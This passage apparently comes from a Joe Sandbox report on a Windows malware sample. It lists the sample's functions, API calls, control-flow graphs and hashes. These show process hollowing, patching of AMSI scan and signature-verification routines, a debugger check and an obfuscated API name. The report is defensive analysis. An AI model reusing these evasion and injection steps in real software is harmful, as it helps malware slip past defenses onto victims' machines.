                                                                                                                          • Part of subcall function 029D8824: FreeLibrary.KERNEL32(74B10000,00000000,02A21388,Function_000065D8,00000004,02A21398,02A21388,05F5E0FF,00000040,02A2139C,74B10000,00000000,00000000,00000000,00000000,029D890B), ref: 029D88EB
                                                                                                                          • Part of subcall function 029D85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029D8668
                                                                                                                        • GetThreadContext.KERNEL32(00000860,02A21420,ScanString,02A213A4,029DA77C,UacInitialize,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,UacInitialize,02A213A4), ref: 029D9442
                                                                                                                          • Part of subcall function 029D8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D82C5
                                                                                                                          • Part of subcall function 029D84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 029D8529
                                                                                                                          • Part of subcall function 029D79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029D7A27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                        • API String ID: 4113022151-51457883
                                                                                                                        • Opcode ID: ac664f6e160cb30134341b05af1ad2c25a0e5ae65f8f81d93c6cf2670d88bbb7
                                                                                                                        • Instruction ID: f3b5d722b6785ea9a9c7c5f99f7d0cf6fc0f4694cc8f76880fec9cdb3d0d6979
                                                                                                                        • Opcode Fuzzy Hash: ac664f6e160cb30134341b05af1ad2c25a0e5ae65f8f81d93c6cf2670d88bbb7
                                                                                                                        • Instruction Fuzzy Hash: A6E21D35B501189BDB11FB64CDA0BDE73FAAFC9310F2090A5E009AB215DE30EE569F52
                                                                                                                        Function 029C5A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 8510 29c5a78-29c5ab9 GetModuleFileNameA RegOpenKeyExA 8511 29c5afb-29c5b3e call 29c58b4 RegQueryValueExA 8510->8511 8512 29c5abb-29c5ad7 RegOpenKeyExA 8510->8512 8517 29c5b40-29c5b5c RegQueryValueExA 8511->8517 8518 29c5b62-29c5b7c RegCloseKey 8511->8518 8512->8511 8513 29c5ad9-29c5af5 RegOpenKeyExA 8512->8513 8513->8511 8516 29c5b84-29c5bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8513->8516 8519 29c5c9e-29c5ca5 8516->8519 8520 29c5bbb-29c5bbf 8516->8520 8517->8518 8521 29c5b5e 8517->8521 8523 29c5bcb-29c5be1 lstrlenA 8520->8523 8524 29c5bc1-29c5bc5 8520->8524 8521->8518 8525 29c5be4-29c5be7 8523->8525 8524->8519 8524->8523 8526 29c5be9-29c5bf1 8525->8526 8527 29c5bf3-29c5bfb 8525->8527 8526->8527 8528 29c5be3 8526->8528 8527->8519 8529 29c5c01-29c5c06 8527->8529 8528->8525 8530 29c5c08-29c5c2e lstrcpynA LoadLibraryExA 8529->8530 8531 29c5c30-29c5c32 8529->8531 8530->8531 8531->8519 8532 29c5c34-29c5c38 8531->8532 8532->8519 8533 29c5c3a-29c5c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8519 8534 29c5c6c-29c5c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8519
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,029C0000,029ED790), ref: 029C5A94
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029C0000,029ED790), ref: 029C5AB2
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029C0000,029ED790), ref: 029C5AD0
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029C5AEE
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029C5B37
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,029C5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029C5B7D,?,80000001), ref: 029C5B55
                                                                                                                        • RegCloseKey.ADVAPI32(?,029C5B84,00000000,?,?,00000000,029C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029C5B77
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029C5B94
                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029C5BA1
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029C5BA7
                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029C5BD2
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029C5C19
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029C5C29
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029C5C51
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029C5C61
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029C5C87
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029C5C97
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                        • API String ID: 1759228003-2375825460
                                                                                                                        • Opcode ID: 06ed4f580039d90649b2f12b992b881ffff81e967019d1970d03cd6af59d9d49
                                                                                                                        • Instruction ID: 65bf1e0ae7b942914bdefc11563eac4655be630858bd94eac36b932aa8e76e26
                                                                                                                        • Opcode Fuzzy Hash: 06ed4f580039d90649b2f12b992b881ffff81e967019d1970d03cd6af59d9d49
                                                                                                                        • Instruction Fuzzy Hash: 7451E871A4020C7EFB25D6A4CC46FEFBBBD9B44340FA101A9A604F61C1DB74EA448F66
                                                                                                                        Function 029D87A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 10477 29d87a0-29d87c5 LoadLibraryW 10478 29d880f-29d8815 10477->10478 10479 29d87c7-29d87df GetProcAddress 10477->10479 10480 29d8804-29d880a FreeLibrary 10479->10480 10481 29d87e1-29d8800 call 29d7d00 10479->10481 10480->10478 10481->10480 10484 29d8802 10481->10484 10484->10480
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,UacScan), ref: 029D87B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029D87CE
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize), ref: 029D880A
                                                                                                                          • Part of subcall function 029D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D7D74
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                                                        • API String ID: 1002360270-4067648912
                                                                                                                        • Opcode ID: 6d62c1b94c058a6005c34ea5dd3cb3ba2b2e4b61e63761f85478651834153b7b
                                                                                                                        • Instruction ID: 5ea59f646bee579f4182ee219936777ad09f15ff1d3b63c2038769c2bfc16417
                                                                                                                        • Opcode Fuzzy Hash: 6d62c1b94c058a6005c34ea5dd3cb3ba2b2e4b61e63761f85478651834153b7b
                                                                                                                        • Instruction Fuzzy Hash: 23F0C871EC12146EEBA0AB6CAB44F76339EE7C1354F1208BDB10C87542EF70941ACB50
                                                                                                                        Function 029DEBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 10494 29debf0-29dec0a GetModuleHandleW 10495 29dec0c-29dec1e GetProcAddress 10494->10495 10496 29dec36-29dec3e 10494->10496 10495->10496 10497 29dec20-29dec30 CheckRemoteDebuggerPresent 10495->10497 10497->10496 10498 29dec32 10497->10498 10498->10496
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 029DEC00
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 029DEC12
                                                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 029DEC29
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                        • API String ID: 35162468-539270669
                                                                                                                        • Opcode ID: 17dc18d7fdf9c56edb841cf2e62d8fda8ec2da95bc095c61a03ad52a80579afe
                                                                                                                        • Instruction ID: 4afa6c36ea49f182bb78530bd2e8f8012eae390dc46a8e93767a513e5e157e2b
                                                                                                                        • Opcode Fuzzy Hash: 17dc18d7fdf9c56edb841cf2e62d8fda8ec2da95bc095c61a03ad52a80579afe
                                                                                                                        • Instruction Fuzzy Hash: 2BF0277090024CABD722E7F888897DCFBAD4B05328FA44794D0A0661C0E37006409652
                                                                                                                        Function 029DDBB0 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 029C4EDA
                                                                                                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDC80), ref: 029DDBEB
                                                                                                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,029DDC80), ref: 029DDC1B
                                                                                                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 029DDC30
                                                                                                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 029DDC5C
                                                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 029DDC65
                                                                                                                          • Part of subcall function 029C4C0C: SysFreeString.OLEAUT32(029DE950), ref: 029C4C1A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2659941336-0
                                                                                                                        • Opcode ID: 608e70772edbecaa4ab343c8103046651aeb613fe627eff43af7eb394543e371
                                                                                                                        • Instruction ID: a59907c151e6f5eda630aca7789bfee1b621117af587b4d086899cdc84f00648
                                                                                                                        • Opcode Fuzzy Hash: 608e70772edbecaa4ab343c8103046651aeb613fe627eff43af7eb394543e371
                                                                                                                        • Instruction Fuzzy Hash: 56213371B403087AEB10EBE4CC52FDEB7BDAF88B00F504425B200F71C1DAB4AA059B65
                                                                                                                        Function 029DE2F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 029DE436
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CheckConnectionInternet
                                                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                        • API String ID: 3847983778-3852638603
                                                                                                                        • Opcode ID: 7757ff1f81fcbac229082f836acad1b1752bc061ea4fb9a4592184c876e3edfc
                                                                                                                        • Instruction ID: d362f025dda89982eead70b215c1a791f3aefb541cb1aeaa126f555ebcb83f18
                                                                                                                        • Opcode Fuzzy Hash: 7757ff1f81fcbac229082f836acad1b1752bc061ea4fb9a4592184c876e3edfc
                                                                                                                        • Instruction Fuzzy Hash: A4411E35B501189BEB00FBA4CD90E9EB3FAEFCC710F319429E085A7244DA74AD019F65
                                                                                                                        Function 029DDACC Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 029C4EDA
                                                                                                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDB9E), ref: 029DDB0B
                                                                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029DDB45
                                                                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029DDB72
                                                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029DDB7B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AllocCloseCreateStringWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3308905243-0
                                                                                                                        • Opcode ID: b3ae2f56c6fd32f544f893e539438e9d5030ea38e9499ac0ee65a16c2acda65b
                                                                                                                        • Instruction ID: 3fd096dca162eb881ecef99be47d149ca4e1c5494cb47beda587a990ffdcd2eb
                                                                                                                        • Opcode Fuzzy Hash: b3ae2f56c6fd32f544f893e539438e9d5030ea38e9499ac0ee65a16c2acda65b
                                                                                                                        • Instruction Fuzzy Hash: 0221ED72A40308BAEB10EAE4CC56F9EB7BDAB44B04F614465B600F71C0D7B46B059A65
                                                                                                                        Function 029D85DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029D8668
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                        • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                        • API String ID: 3130163322-2353454454
                                                                                                                        • Opcode ID: 5216b403a5fdde055c09a8e55104ef1a23e2613cb2fbe7a47d67efd9d55c4328
                                                                                                                        • Instruction ID: cc767ab91600973a0047d7b1c06bb4fd7c40bcc0daa9a4a7242d41fbc1f13e59
                                                                                                                        • Opcode Fuzzy Hash: 5216b403a5fdde055c09a8e55104ef1a23e2613cb2fbe7a47d67efd9d55c4328
                                                                                                                        • Instruction Fuzzy Hash: 661103B6600208AFDB90EEACDD51F9A37EDFB8C710F928454BA08D3641C630E9129B25
                                                                                                                        Function 029D79B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029D7A27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                        • API String ID: 4072585319-445027087
                                                                                                                        • Opcode ID: 4bb5545ea31e38878639491ee2c88ea49d1e4cb3701670e9e7a57983b1748054
                                                                                                                        • Instruction ID: 8ec846b937773285ceb3e65b36646dbf45a9bc1e33df24d688d9503c20069223
                                                                                                                        • Opcode Fuzzy Hash: 4bb5545ea31e38878639491ee2c88ea49d1e4cb3701670e9e7a57983b1748054
                                                                                                                        • Instruction Fuzzy Hash: CA115E75700208BFEB10EFA4DC51FEEB7EEEB88710F918865B904D7640DA30EA159B61
                                                                                                                        Function 029D79B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
